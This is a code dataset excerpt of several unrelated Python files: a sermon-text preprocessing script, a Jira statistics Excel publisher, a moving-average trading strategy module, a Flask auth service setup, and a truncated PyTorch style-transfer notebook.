"file_name": "notebook_lib.py", "file_ext": "py", "file_size_in_byte": 35236, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.decomposition.PCA", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 44, "usage_type": "attribute"}, {"api_name": "numpy.matmul", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mdp.nodes.PCANode", "line_number": 70, "usage_type": "call"}, {"api_name": "mdp.nodes.SFANode", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 112, "usage_type": "call"}, {"api_name": "pydmd.DMD", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.newaxis", "line_number": 150, "usage_type": "attribute"}, {"api_name": "numpy.real", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.matmul", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.newaxis", "line_number": 167, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 186, 
"usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 200, "usage_type": "attribute"}, {"api_name": "pyclimine.evaluate.all_to_all_comparison_metric", "line_number": 231, "usage_type": "call"}, {"api_name": "pyclimine.evaluate", "line_number": 231, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.tri", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 236, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 252, "usage_type": "call"}, {"api_name": "scipy.stats.pearsonr", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 278, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 281, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 300, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 300, "usage_type": "name"}, {"api_name": "cartopy.crs.PlateCarree", "line_number": 301, "usage_type": "call"}, {"api_name": "cartopy.crs", "line_number": 301, "usage_type": "name"}, {"api_name": "numpy.nanmax", "line_number": 309, "usage_type": "call"}, {"api_name": "matplotlib.gridspec.GridSpecFromSubplotSpec", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 326, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "numpy.nansum", "line_number": 333, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 337, "usage_type": "call"}, {"api_name": "cmocean.cm", "line_number": 342, "usage_type": "attribute"}, {"api_name": "numpy.all", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 382, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 392, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 392, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpecFromSubplotSpec", "line_number": 410, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 410, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 413, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 413, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 440, "usage_type": 
"attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 472, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 472, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 490, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 513, "usage_type": "call"}, {"api_name": "scipy.signal.welch", "line_number": 514, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 514, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 526, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 526, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 538, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 538, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 553, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 553, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 562, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 562, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 572, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 580, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 605, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 612, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 646, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 646, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 649, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 649, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 660, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 664, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 670, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 681, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 684, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 689, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 697, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 699, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 700, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 701, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 702, "usage_type": "call"}, {"api_name": "pyclimine.generate.calculate_central_angle", "line_number": 703, "usage_type": "call"}, {"api_name": "pyclimine.generate", 
"line_number": 703, "usage_type": "attribute"}, {"api_name": "numpy.argmin", "line_number": 704, "usage_type": "call"}, {"api_name": "pyclimine.process.signal_processing", "line_number": 716, "usage_type": "call"}, {"api_name": "pyclimine.process", "line_number": 716, "usage_type": "attribute"}, {"api_name": "scipy.signal.butter", "line_number": 753, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 764, "usage_type": "call"}, {"api_name": "scipy.signal.lfilter", "line_number": 766, "usage_type": "call"}, {"api_name": "numpy.vectorize", "line_number": 770, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 805, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 806, "usage_type": "call"}, {"api_name": "xarray.merge", "line_number": 807, "usage_type": "call"}, {"api_name": "pyclimine.process.signal_processing", "line_number": 821, "usage_type": "call"}, {"api_name": "pyclimine.process", "line_number": 821, "usage_type": "attribute"}, {"api_name": "numpy.product", "line_number": 839, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 840, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 840, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 840, "usage_type": "attribute"}, {"api_name": "{'SFANode': 'mdp.nodes.SFANode', 'PCANode': 'mdp.nodes.PCANode'}", "line_number": 844, "usage_type": "call"}, {"api_name": "{'DMD': 'pydmd.DMD'}", "line_number": 845, "usage_type": "call"}, {"api_name": "{'PCA': 'sklearn.decomposition.PCA'}", "line_number": 846, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 875, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 875, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 879, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 879, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 897, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 897, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 898, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 898, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 899, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 899, "usage_type": "name"}]} +{"seq_id": "621469175", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 26 14:45:22 2018\n\n@author: sum410\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCleans multiple documents of sermon corpus\nCreated on Wed Sep 26 13:22:46 2018\n@author: sum410\n\"\"\"\n\nimport os\nimport glob\nimport string\nimport nltk\n#nltk.download()\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.porter import PorterStemmer\nimport re\nimport pickle\n\nos.chdir('C:/Users/sum410/Dropbox/PoliticsOfSermons/Data/SampleLDA')\n\n# Empty list and read in files as elements again\n# Read in sample sermon data\nfile_list = glob.glob(os.path.join(os.getcwd(),\n \"C:/Users/sum410/Dropbox/PoliticsOfSermons/Data/MasterList\", \"*.txt\"))\nsample_serms = []\nfor file_path in file_list[0:1000]:\n with open(file_path, encoding=\"utf8\") as f_input:\n sample_serms.append(f_input.read()) # 3 sermons in list\n\n# Apply word_tokenize to each element of the list called incoming_reports\ntokenized_serms = [word_tokenize(doc) for doc in sample_serms]\n\n## Remove punctuation\nregex = re.compile('[%s]' % 
re.escape(string.punctuation))\ntokenized_serms_no_punctuation = []\nfor serm in tokenized_serms:\n new_serm = []\n for token in serm: \n new_token = regex.sub(u'', token)\n if not new_token == u'':\n new_serm.append(new_token)\n \n tokenized_serms_no_punctuation.append(new_serm)\n\nprint(len(tokenized_serms_no_punctuation))\n\n## Remove stop words\ntokenized_serms_no_stopwords = []\nfor serm in tokenized_serms_no_punctuation:\n new_term_vector = []\n for word in serm:\n if not word in stopwords.words('english'):\n new_term_vector.append(word)\n tokenized_serms_no_stopwords.append(new_term_vector)\n \nprint(len(tokenized_serms_no_stopwords))\n\n## Remove numbers\nnonstemmed_docs = []\nfor serm in tokenized_serms_no_stopwords:\n no_num_vector = []\n for word in serm:\n word = ''.join([i for i in word if not i.isdigit()])\n if word != '':\n no_num_vector.append(word)\n nonstemmed_docs.append(no_num_vector)\n \n#nonstemmed_docs = list(filter(None, nonstemmed_docs))\nprint(len(nonstemmed_docs))\n\n## Stem words\nporter = PorterStemmer()\nstemmed_docs = []\nfor doc in nonstemmed_docs:\n final_doc = []\n for word in doc:\n final_doc.append(porter.stem(word))\n stemmed_docs.append(final_doc)\n \nprint(len(stemmed_docs))\n\n# Delete intermediate lists\ndel tokenized_serms_no_punctuation, tokenized_serms_no_stopwords\n\n# Save stemmed and non-stemmed docs \nwith open('saved_preprocess.pkl', 'wb') as f: \n pickle.dump([nonstemmed_docs, stemmed_docs], f)\n", "sub_path": "Exploratory/preprocess2[wip].py", "file_name": "preprocess2[wip].py", "file_ext": "py", "file_size_in_byte": 2611, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 26, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 30, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 38, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 41, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 41, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 41, "usage_type": "attribute"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 59, "usage_type": "name"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 79, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "509302414", "text": "\"\"\"\nJira Stats Publisher.\n\nTakes a report config detailing which reports to publish and\na Jira Wrapper which provides the data for the reports\n\"\"\"\n\nimport os\nimport pandas as pd\nimport logging\n\nfrom xlsxwriter.utility import xl_rowcol_to_cell\n\n_state_default_colours = ['#8dd3c7',\n '#ffffb3',\n '#bebada',\n '#fb8072',\n '#80b1d3',\n '#fdb462',\n '#b3de69',\n '#fccde5',\n '#d9d9d9',\n '#bc80bd',\n '#ccebc5',\n '#ffed6f']\n\n\ndef publish(config, jira, from_date, to_date):\n\n writer = None\n\n if config['format'] == 'xlsx':\n excel_basename = config['name']\n excel_filename = os.path.join(config['location'],\n excel_basename + '.xlsx')\n writer = pd.ExcelWriter(excel_filename, engine='xlsxwriter')\n\n for report in config['reports']:\n\n data = None\n\n if report['metric'] == 'history':\n data = 
jira.history(from_date, to_date)\n\n if data is not None:\n if isinstance(writer, pd.ExcelWriter):\n\n sheet_name = []\n\n sheet_name.append(report['metric'])\n\n worksheet_name = worksheet_title('-'.join(sheet_name))\n\n data.to_excel(writer, worksheet_name)\n\n\n if report['metric'] == 'history':\n if 'format' in report:\n formats = report['format']\n else:\n formats = format_states(config['states'])\n workbook = writer.book\n sheets = [sheet for sheet in workbook.worksheets() if sheet.name[-7:] == 'history']\n # Do the colouring in\n for sheet in sheets:\n colour_cfd(workbook, sheet, data, formats)\n\n if isinstance(writer, pd.ExcelWriter):\n writer.save()\n\n\ndef format_states(states):\n\n formats = {}\n\n for index, state in enumerate(states):\n try:\n formats[state] = {'color': _state_default_colours[index]}\n except IndexError:\n rebased_index = index\n while rebased_index >= len(_state_default_colours):\n rebased_index = rebased_index - len(_state_default_colours)\n formats[state] = {'color': _state_default_colours[rebased_index]}\n\n return formats\n\n\ndef colour_cfd(workbook, worksheet, data, formats):\n\n workbook_formats = {}\n\n for i, row in enumerate(data.values):\n for j, cell in enumerate(row):\n\n try:\n color = formats[cell]['color']\n if color not in workbook_formats:\n\n new_format = workbook.add_format()\n new_format.set_bg_color(color)\n workbook_formats[color] = new_format\n\n cell_ref = xl_rowcol_to_cell(i+1, j+1)\n worksheet.write(cell_ref, cell, workbook_formats[color])\n except KeyError:\n pass\n\n\ndef worksheet_title(full_title):\n \"\"\"\n Shorten the title if it is not going to fit on the worksheet\n \"\"\"\n\n _MAX_LENGTH = 30\n\n excess = len(full_title) - _MAX_LENGTH\n\n if excess > 0:\n parts = full_title.split('-')\n shorten_by = max(1, excess // len(parts)) # integer division, at least 1, so the slice below always shortens\n\n short_title = full_title\n\n while len(short_title) > _MAX_LENGTH:\n longest = max(parts[:-1], key=len)\n if len(longest) > shorten_by:\n parts[parts.index(longest)] = longest[:-shorten_by]\n\n short_title = ''\n for part in parts[:-1]:\n short_title += part\n short_title += '-'\n\n short_title += parts[-1]\n else:\n short_title = short_title[:_MAX_LENGTH-len(parts[-1])] + parts[-1]\n\n return short_title\n\n else:\n return full_title\n", "sub_path": "jlf_stats/publisher.py", "file_name": "publisher.py", "file_ext": "py", "file_size_in_byte": 4046, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pandas.ExcelWriter", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.ExcelWriter", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pandas.ExcelWriter", "line_number": 68, "usage_type": "attribute"}, {"api_name": "xlsxwriter.utility.xl_rowcol_to_cell", "line_number": 103, "usage_type": "call"}]} +{"seq_id": "144365468", "text": "import analysis as an\nimport backtester as bt\nimport exchange_API as API\nimport portfolio as pf\nimport database as db\n\nimport logging\n\n\n\ndef strategy_update(df, index, strategy):\n\n import numpy as np\n\n # ignore 1st index, apply strategies after that\n if index != 0:\n\n # iterating through technicals and updating them into the df\n for techkey, techvalue in strategy['technicals'].items():\n techvalue['type'](df, index, techkey, techvalue)\n\n # iterating through buy conditions and updating them into the df\n if 
check_strategy_conditions(df, index, strategy['buy']):\n df.at[index, 'order'] = 'buy'\n df.at[index, 'order_qty'] = df.at[index-1, 'instrument_1_qty'] / df.at[index, 'close']\n\n # iterating through sell conditions and updating them into the df\n if check_strategy_conditions(df, index, strategy['sell']):\n df.at[index, 'order'] = 'sell'\n df.at[index, 'order_qty'] = df.at[index-1, 'instrument_2_qty']\n\n logging.debug('Strategy updated. Index {}'.format(index))\n\n else:\n df.at[index, 'order'] = 'none'\n df.at[index, 'order_qty'] = 0\n\ndef check_strategy_conditions(df, index, value):\n if type(value['a']) == dict:\n a = check_strategy_conditions(df, index, value['a'])\n elif type(value['a']) == str:\n a = df.at[index, value['a']]\n else:\n a = value['a']\n\n if type(value['b']) == dict:\n b = check_strategy_conditions(df, index, value['b'])\n elif type(value['b']) == str:\n b = df.at[index, value['b']]\n else:\n b = value['b']\n\n result = value['op'](a, b)\n\n return result\n\n\n\ndef sma(df, index, name, values):\n \"\"\"\n Performs a simple moving average on the close price of the primary dataframe\n\n Parameters\n ----------\n df : primary dataframe\n index : index of the primary dataframe to write the SMA to\n window : The number of rows working backward from the index to apply the SMA to\n\n Returns\n -------\n The results get written to the primary dataframe in the index row\n \"\"\"\n\n df.at[index, name] = df['close'].rolling(values['window'],\n min_periods=values['window']).mean()[index]\n\n logging.debug('SMA written to primary dataframe. Index {}'.format(index))\n\n\n\ndef ema(df, index, name, values):\n \"\"\"\n Performs an exponential moving average on the close price of the primary dataframe\n\n Parameters\n ----------\n df : primary dataframe\n index : index of the primary dataframe to write the EMA to\n window : The number of rows working backward from the index to apply the EMA to\n\n Returns\n -------\n The results get written to the primary dataframe in the index row\n\n \"\"\"\n\n df.at[index, name] = df['close'].ewm(span=values['window'],\n min_periods=values['window']).mean()[index]\n\n logging.debug('EMA written to primary dataframe. 
Index {}'.format(index))\n\n\n\ndef bollinger(df, index, name, values):\n\n # values['window']\n # values['K']\n\n # sma(df, index, name, {'window' : values['window']})\n\n pass\n", "sub_path": "cralgo/strategy.py", "file_name": "strategy.py", "file_ext": "py", "file_size_in_byte": 3102, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "logging.debug", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "204871382", "text": "import logging.config\n\nfrom auth_service.database import db, migrate\nfrom auth_service.extensions import cors, ma\nfrom flask import Flask\n\nfrom .config import config\nfrom auth_service.oauth2 import config_oauth\n\n\ndef create_app(config_name=\"default\", settings_override=None):\n init_logging()\n\n app = Flask(__name__)\n app_config = config[config_name]\n app.config.from_object(app_config)\n app_config.init_app(app)\n\n init_db(app)\n init_extensions(app)\n\n if settings_override:\n app.config.update(settings_override)\n\n init_blueprint(app)\n config_oauth(app)\n\n return app\n\n\ndef init_logging():\n LOGGING = {\n \"version\": 1,\n \"formatters\": {\n \"brief\": {\"format\": \"%(message)s\"},\n \"default\": {\n \"format\": \"%(asctime)s %(levelname)-8s %(name)-15s %(message)s\",\n \"datefmt\": \"%Y-%m-%d %H:%M:%S\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"DEBUG\",\n \"formatter\": \"default\",\n \"stream\": \"ext://sys.stdout\",\n },\n \"none\": {\"class\": \"logging.NullHandler\"},\n },\n \"loggers\": {\n \"amqp\": {\"handlers\": [\"none\"], \"propagate\": False},\n \"conf\": {\"handlers\": [\"none\"], \"propagate\": False},\n \"\": {\n \"handlers\": [\n \"console\",\n ],\n \"level\": \"DEBUG\",\n \"propagate\": False,\n },\n },\n }\n\n logging.config.dictConfig(LOGGING)\n\n\ndef init_db(app):\n db.init_app(app)\n migrate.init_app(app, db)\n\n\ndef init_extensions(app):\n cors.init_app(\n app,\n resources={\n r\"/*\": {\"origins\": \"*\"},\n },\n )\n ma.init_app(app)\n\n\ndef init_blueprint(app):\n from auth_service.api import api as api_bp\n from auth_service.oauth import oauth2 as oauth_bp\n from auth_service.swagger import swagger_bp\n\n app.register_blueprint(api_bp, url_prefix=\"/api\")\n app.register_blueprint(oauth_bp, url_prefix=\"/oauth\")\n app.register_blueprint(swagger_bp, url_prefix=\"/swagger\")\n", "sub_path": "auth_service/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 2180, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "config.config", "line_number": 15, "usage_type": "name"}, {"api_name": "auth_service.oauth2.config_oauth", "line_number": 26, "usage_type": "call"}, {"api_name": "logging.config.config.dictConfig", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.config.config", "line_number": 63, "usage_type": "attribute"}, {"api_name": "logging.config", "line_number": 63, "usage_type": "name"}, {"api_name": "auth_service.database.db.init_app", "line_number": 67, "usage_type": "call"}, {"api_name": "auth_service.database.db", "line_number": 67, "usage_type": "name"}, {"api_name": "auth_service.database.migrate.init_app", "line_number": 68, "usage_type": "call"}, 
{"api_name": "auth_service.database.db", "line_number": 68, "usage_type": "argument"}, {"api_name": "auth_service.database.migrate", "line_number": 68, "usage_type": "name"}, {"api_name": "auth_service.extensions.cors.init_app", "line_number": 72, "usage_type": "call"}, {"api_name": "auth_service.extensions.cors", "line_number": 72, "usage_type": "name"}, {"api_name": "auth_service.extensions.ma.init_app", "line_number": 78, "usage_type": "call"}, {"api_name": "auth_service.extensions.ma", "line_number": 78, "usage_type": "name"}, {"api_name": "auth_service.api.api", "line_number": 86, "usage_type": "argument"}, {"api_name": "auth_service.oauth.oauth2", "line_number": 87, "usage_type": "argument"}, {"api_name": "auth_service.swagger.swagger_bp", "line_number": 88, "usage_type": "argument"}]} +{"seq_id": "280040740", "text": "# To add a new cell, type '#%%'\n# To add a new markdown cell, type '#%% [markdown]'\n#%% Change working directory from the workspace root to the ipynb file location. Turn this addition off with the DataScience.changeDirOnImportExport setting\n# ms-python.python added\nimport os\ntry:\n\tos.chdir(os.path.join(os.getcwd(), 'lab5'))\n\tprint(os.getcwd())\nexcept:\n\tpass\n#%% [markdown]\n# # Style Transfer\n# To start off, you might ask, what is Style transfer?\n# It's a way of adding the *style* of one image, say a painting to the *content* of another image, like a photo.\n# \n# Let's start by importing some libraries:\n# \n# \n# * Import torch, torch.nn for working with PyTorch\n# * Import numpy for numbers\n# * Import PIL and matplotlib to load and display images\n# * Import torchvision to train or load pre-trained models\n# * Import copy to models\n# * Import files from google.colab, so that we can upload images from the local drive.\n# \n# \n# \n\n#%%\nfrom __future__ import print_function\n\nimport copy\nimport os\nimport io\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nimport numpy as np\nimport PIL\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\nfrom google.colab import files \n\nfrom tensorflow.python.layers import base\n\n\n#%%\n# If we have cuda then use it!\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# desired size of the output image, use small size if no gpu\nimsize = (1024, 1024) if torch.cuda.is_available() else (128, 160)\n\n# Define the transforms to be performed on images\nloader = transforms.Compose([\n transforms.Resize(imsize), # scale imported image\n transforms.ToTensor()]) # transform it into a torch tensor\n\n\ndef image_loader(image_name):\n \n # load the image from the notebook filesystem\n image = Image.open(image_name)\n \n # fake batch dimension required to fit network's input dimensions\n image = loader(image).unsqueeze(0)\n \n # convert the image to a tensor of floats on the gpu and return\n return image.to(device, torch.float)\n\n\ndef imshow(tensors, title=None):\n unloader = transforms.ToPILImage() # reconvert into PIL image \n num = len(tensors)\n f, axs = plt.subplots(1,num, figsize=(8*num, 8))\n \n for i in range(len(tensors)):\n image = tensors[i].cpu().clone() # we clone the tensor to not make changes to the original\n image = image.squeeze(0) # remove the batch dimension\n image = unloader(image) # transform the image from a tensor to a PIL image so we can show it.\n\n p = plt.subplot(1,num,i+1)\n p.imshow(image)\n p.axis('off')\n \n if title is 
not None: # Display the title if there is one.\n plt.title(title[i]) \n\n plt.show()\n plt.pause(0.001) # pause a bit so that plots are updated\n\n#%% [markdown]\n# # Importing files\n# \n# Use the interactive cells below to upload a style image and a content image. Bigger images are better. We need to change the sizes of our images, to make sure that the style and content images are the same size. If they don't match, we could run into some very avoidable problems later.\n# \n\n#%%\nprint('Upload Content Image')\nfile_dict = files.upload()\n\n# this is a trick to get the name of the last uploaded file and pass it to image_loader()\ncontent_img = image_loader(io.BytesIO(file_dict[next(iter(file_dict))]))\n\n# clone the content image so we don't have to re-upload if something goes wrong.\ninput_img = content_img.clone()\n\n# if you want to use white noise instead uncomment the below line:\n#input_img = torch.randn(content_img.data.size(), device=device)\n\n\n#%%\nprint('\\nUpload Style Image')\nfile_dict = files.upload()\n\n# this is a trick to get the name of the last uploaded file and pass it to image_loader()\nstyle_img = image_loader(io.BytesIO(file_dict[next(iter(file_dict))]))\n\n# our network can't handle images that aren't the same size.\nassert style_img.size() == content_img.size(), \"we need to import style and content images of the same size\"\n\n#%% [markdown]\n# #Take a look!\n# \n# Here is where we take our images and convert them back from tensors into PIL images.\n# \n# We also clone the tensors so that we don't make changes to the original\n# \n# Last of all, we print the images with matplotlib, to make sure the sizes are working.\n\n#%%\nimshow([style_img, content_img], title=['Style Image', 'Content Image'])\n\n#%% [markdown]\n# #Loss Functions\n# \n# Here we define our loss functions and our matrix that will be \"scrubbing\" our image.\n# \n# Matrix dimensions are as follows:\n# * A - Batch size\n# * B - Number of feature maps\n# * C - Dimensions of an f.map (N=C*D)\n# * D - The 2nd part of that f.map\n\n#%%\ndef gram_matrix(input):\n # b = batch size (i.e., 1)\n # f = number of feature maps\n # (h,w) = dimensions of a f. map (N=h*w) \n b, f, h, w = input.size() \n\n # resize the input so we can get the gram matrix\n features = input.view(b * f, h * w)\n \n # calculate the ortho-normal basis\n basis = torch.mm(features, features.t())\n\n # 'normalize' by dividing by the number of elements in each feature map\n gram = basis.div(b * f * h * w)\n \n return gram\n\nclass StyleLoss(nn.Module):\n def __init__(self, target_feature):\n super(StyleLoss, self).__init__()\n \n # detach to ensure we don't back prop into our gram matrix\n self.target = gram_matrix(target_feature).detach()\n\n def forward(self, input):\n G = gram_matrix(input)\n \n # mean squared error between the gram matrices of our style image and the input image\n self.loss = F.mse_loss(G, self.target)\n\n return input\n\n \nclass ContentLoss(nn.Module):\n def __init__(self, target):\n super(ContentLoss, self).__init__()\n\n # we 'detach' the target content from the tree used\n # to dynamically compute the gradient: this is a stated value,\n # not a variable. 
